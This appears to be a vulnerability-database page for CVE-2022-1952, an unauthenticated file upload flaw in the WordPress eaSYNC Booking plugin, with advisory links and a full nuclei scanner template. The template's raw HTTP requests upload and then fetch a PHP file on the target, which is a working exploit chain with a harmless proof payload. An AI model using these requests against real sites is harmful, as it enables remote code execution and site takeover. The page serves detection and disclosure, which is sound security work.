Lucene search
K

WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload

šŸ—“ļøĀ 29 Jun 2026Ā 05:52:57Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 70Ā Views

WordPress eaSYNC Booking plugin <1.1.16 - Arbitrary File Upload vulnerability allows remote code execution. Update to version 1.1.16 or apply the vendor patch

Related
Refs
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2022-1952
11 Jul 202213:15
–attackerkb
Circl
CVE-2022-1952
30 Jun 202209:48
–circl
CNNVD
WordPress plugin Free Booking Plugin for Hotels, Restaurant and Car Rental ä»£ē é—®é¢˜ę¼ę“ž
11 Jul 202200:00
–cnnvd
CNVD
WordPress Hotels/Restaurant/Car Rental Free Booking plugin Arbitrary File Upload Vulnerability
13 Jul 202200:00
–cnvd
CVE
CVE-2022-1952
11 Jul 202212:56
–cve
Cvelist
CVE-2022-1952 eaSYNC < 1.1.16 - Unauthenticated Arbitrary File Upload
11 Jul 202212:56
–cvelist
NVD
CVE-2022-1952
11 Jul 202213:15
–nvd
OSV
CVE-2022-1952
11 Jul 202213:15
–osv
Patchstack
WordPress eaSYNC plugin <= 1.1.15 - Unauthenticated Arbitrary File Upload vulnerability
15 Jun 202200:00
–patchstack
Prion
Input validation
11 Jul 202213:15
–prion
Rows per page
id: CVE-2022-1952

info:
  name: WordPress eaSYNC Booking <1.1.16 - Arbitrary File Upload
  author: theamanrawat
  severity: critical
  description: |
    WordPress eaSync Booking plugin bundle for hotel, restaurant and car rental before 1.1.16 is susceptible to arbitrary file upload. The plugin contains insufficient input validation of an AJAX action. An allowlist of valid file extensions is defined but is not used during the validation steps. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation of this vulnerability could result in remote code execution, allowing an attacker to take complete control of the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress eaSYNC Booking plugin (1.1.16) or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://wpscan.com/vulnerability/ecf61d17-8b07-4cb6-93a8-64c2c4fbbe04
    - https://wordpress.org/plugins/easync-booking/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1952
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-1952
    cwe-id: CWE-434
    epss-score: 0.17572
    epss-percentile: 0.96762
    cpe: cpe:2.3:a:syntactics:free_booking_plugin_for_hotels\,_restaurant_and_car_rental:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: syntactics
    product: free_booking_plugin_for_hotels\,_restaurant_and_car_rental
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,easync-booking,unauth,wp,file-upload,wp-plugin,intrusive,syntactics,vkev,vuln
variables:
  string: "CVE-2022-1952"

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
        Content-Type: multipart/form-data; boundary=------------------------98efee55508c5059

        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="action"

        easync_session_store
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="type"

        car
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="with_driver"

        self-driven
        --------------------------98efee55508c5059
        Content-Disposition: form-data; name="driver_license_image2"; filename="{{randstr}}.php"
        Content-Type: application/octet-stream

        <?php echo md5("{{string}}");unlink(__FILE__);?>

        --------------------------98efee55508c5059--
      - |
        GET /wp-admin/admin-ajax.php?action=easync_success_and_save HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID=a0d5959357e474aef655313f69891f37
      - |
        GET /wp-content/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_3
        words:
          - '{{md5(string)}}'

    extractors:
      - type: regex
        name: filename
        group: 1
        regex:
          - 'wp-content\\\/uploads\\\/([0-9a-zA-Z]+).php'
        internal: true
# digest: 4a0a0047304502202428917bee934978708bb93be5de812f10d928328cf771c3f8971921fec3163a022100850d278a40cd1e915150e50077f07cc7f8c2ba68490aeedf6ee1bd184f1f83d0:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.19.8
EPSS0.17572
70